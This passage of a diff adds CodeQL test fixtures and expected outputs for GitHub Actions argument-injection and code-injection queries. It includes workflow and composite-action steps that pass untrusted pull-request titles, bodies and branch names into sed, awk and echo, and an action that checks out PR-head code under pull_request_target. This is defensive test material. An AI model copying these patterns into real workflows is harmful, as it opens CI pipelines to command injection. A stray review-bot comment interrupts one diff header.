VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +subpaths +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref new file mode 100644 index 000000000000..e36c9c6f3e82 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected new file mode 100644 index 000000000000..12171d8c7f27 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -0,0 +1,23 @@
+edges
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config |
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config |
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config |
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config |
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config |
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config |
+nodes
+| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title |
+| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n |
+| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # 
VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n |
+| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n |
+| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n |
+| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n |
+| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n |
+| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n |
+| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n |
+| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # 
VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n |
+| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n |
+| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n |
+| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n |
+subpaths
+#select
diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref
new file mode 100644
index 000000000000..afc26233870a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref
@@ -0,0 +1 @@
+Security/CWE-088/ArgumentInjectionMedium.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
new file mode 100644
index 000000000000..ba7d3eec1af7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
@@ -0,0 +1,7 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
new file mode 100644
index 000000000000..20f8d227348d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
@@ -0,0 +1,17 @@
+name: 'Hello World'
+description: 'Greet someone and record the time'
+inputs:
+ who-to-greet: # id of input
+ description: 'Who to greet'
+ required: true
+ default: 'World'
+outputs:
+ time: # id of output
+ description: 'The time we greeted you'
+runs:
+ using: 'docker'
+ steps: # this is actually invalid, used to test we correctly identify composite actions
+ - run: echo '${{ github.event.comment.body }}'
+ image: 'Dockerfile'
+ args:
+ - ${{ inputs.who-to-greet }}
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
new file mode 100644
index 000000000000..510ad86cbfa9
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
@@ -0,0 +1,9 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ env:
+ FOO: ${{ secrets.FOO}}
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
new file mode 100644
index 000000000000..ba7d3eec1af7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
@@ -0,0 +1,7 @@
+name: 'Test'
+description: 'Test'
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.pull_request.body }}'
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
new file mode 100644
index 000000000000..53a2e0c87e27
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
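Review bot: action4/action.yml is byte-for-byte identical to action1/action.yml (both hunks carry the same blob index ba7d3eec1af7), and action7/action.yml later in this diff repeats the 251-line action6/action.yml with the single added comment `# this action is not called in the test`; none of the copies records why a separate path with the same content is needed. Without that, a later fixture cleanup is likely to fold the duplicates together and silently drop whatever case they cover. A one-line header in each duplicate, such as `# Intentionally identical to action1/action.yml: <reason the test needs a second path>`, would be enough. It is only inferred from these hunks that the test needs distinct action paths rather than distinct content, so the wording of the comment should come from the query under test.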
@@ -0,0 +1,34 @@
+name: 'Test'
+description: 'Test'
+inputs:
+ taint:
+ description: 'text'
+ required: true
+ default: 'Foo'
+outputs:
+ result:
+ description: "result"
+ value: ${{ steps.step.outputs.result }}
+ result2:
+ description: "result"
+ value: ${{ steps.step2.outputs.result2 }}
+runs:
+ using: 'composite'
+ steps:
+ - shell: bash
+ run: echo '${{ github.event.issue.body }}'
+ - name: Step
+ id: step
+ env:
+ FOO: ${{ inputs.taint }}
+ shell: bash
+ run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT
+ - id: step2
+ env:
+ FOO2: ${{ github.event.issue.body }}
+ shell: bash
+ run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT
+ - name: Sink
+ id: sink
+ shell: bash
+ run: echo "${{ inputs.taint }}"
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml
new file mode 100644
index 000000000000..0048a4ca31e1
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml
@@ -0,0 +1,251 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q 
git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name 
should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml new file mode 100644 index 000000000000..8bffcdc4020e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml 
@@ -0,0 +1,252 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + 